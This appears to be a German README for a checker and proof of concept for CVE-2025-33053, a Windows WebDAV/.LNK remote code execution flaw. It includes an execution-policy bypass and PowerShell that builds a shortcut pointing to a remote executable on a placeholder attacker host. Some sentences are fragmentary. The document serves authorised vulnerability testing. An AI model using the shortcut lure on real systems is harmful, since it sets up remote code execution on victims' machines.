
CVE-2025-33053 Checker und PoC
Checker-Nachweis
PoC-Nachweis
Ein vollständiges Set an Tools, um die potenzielle Ausnutzung von CVE-2025-33053 zu prüfen und zu demonstrieren – eine kritische WebDAV-basierte Schwachstelle zur Remotecodeausführung (RCE), die Windows-Systeme betrifft.
CVE-2025-33053 ermöglicht Angreifern, .LNK-Verknüpfungsdateien auszunutzen, die auf bösartige entfernte WebDAV-Freigaben verweisen, was auf betroffenen Systemen potenziell zu Remotecodeausführung (RCE) führen kann.
.LNK-Dateien..LNK-Datei oder direkter UNC-Pfadzugriff — verweist auf einen entfernten UNC-Pfad wie:.LNK-Datei zugegriffen oder der UNC-Pfad manuell aufgerufen wird (z. B. über den Datei-Explorer): - Der WebClient-Dienst initiiert die Kommunikation mit dem entfernten UNC-Speicherort über WebDAV. - Das System sendet eine PROPFIND-Anfrage, um Metadaten vom Server des Angreifers abzufragen.CVE-2025-33053_checker.ps1)| Prüfung | Zweck |
|---|---|
| 🔍 Status des WebClient-Dienstes | Bestätigt, ob die WebDAV-Unterstützung aktiv ist und ausgeführt wird. |
| 🔍 UNC-Pfadbehandlung über Test-Path | Testet, ob das System entfernte WebDAV-UNC-Pfade auflöst (wichtige Voraussetzung für die CVE-Ausnutzung). |
Öffnen Sie PowerShell als Administrator.
Wenn die Skriptausführung eingeschränkt ist, führen Sie Folgendes aus:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Funktionen:
Verwendung:
python3 CVE-2025-33053_PoC.py --port 8000
\\<Kali-IP>@8000\DavWWWRoot\route.exe
\\<Kali-IP>@8000\DavWWWRoot\route.exe
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
✔️ Verwendet echte UNC-Pfadauflösung — keine Simulation. ✔️ Erfasst tatsächliche, vom Betriebssystem ausgelöste PROPFIND-Anfragen — das exakte Verhalten, das für die CVE-Ausnutzung erforderlich ist. ✔️ Demonstriert die Schwachstelle mit echten Nachweisen auf Netzwerkebene, ohne Payloads auszuführen oder Schaden zu verursachen.
Dieses PoC nutzt das Zielsystem nicht aus und schädigt es nicht — es erkennt lediglich das zugrunde liegende anfällige Verhalten. Vorgesehen für die Verwendung in kontrollierten Umgebungen oder mit ausdrücklicher Genehmigung. Demonstriert reales Systemverhalten — keine simulierte Nachstellung. Nur für Bildungszwecke. Nicht auf nicht autorisierten Systemen ausführen.
MIT-Lizenz — Nur für Bildungs-, Forschungs- und Verteidigungszwecke frei nutzbar.
Pull-Requests sind willkommen — verbessern Sie die Erkennung, fügen Sie Funktionen hinzu oder schlagen Sie Korrekturen vor.
Dieses Repository dient nur Bildungs- und autorisierten Sicherheitsforschungszwecken. Missbrauch gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben, ist strengstens untersagt.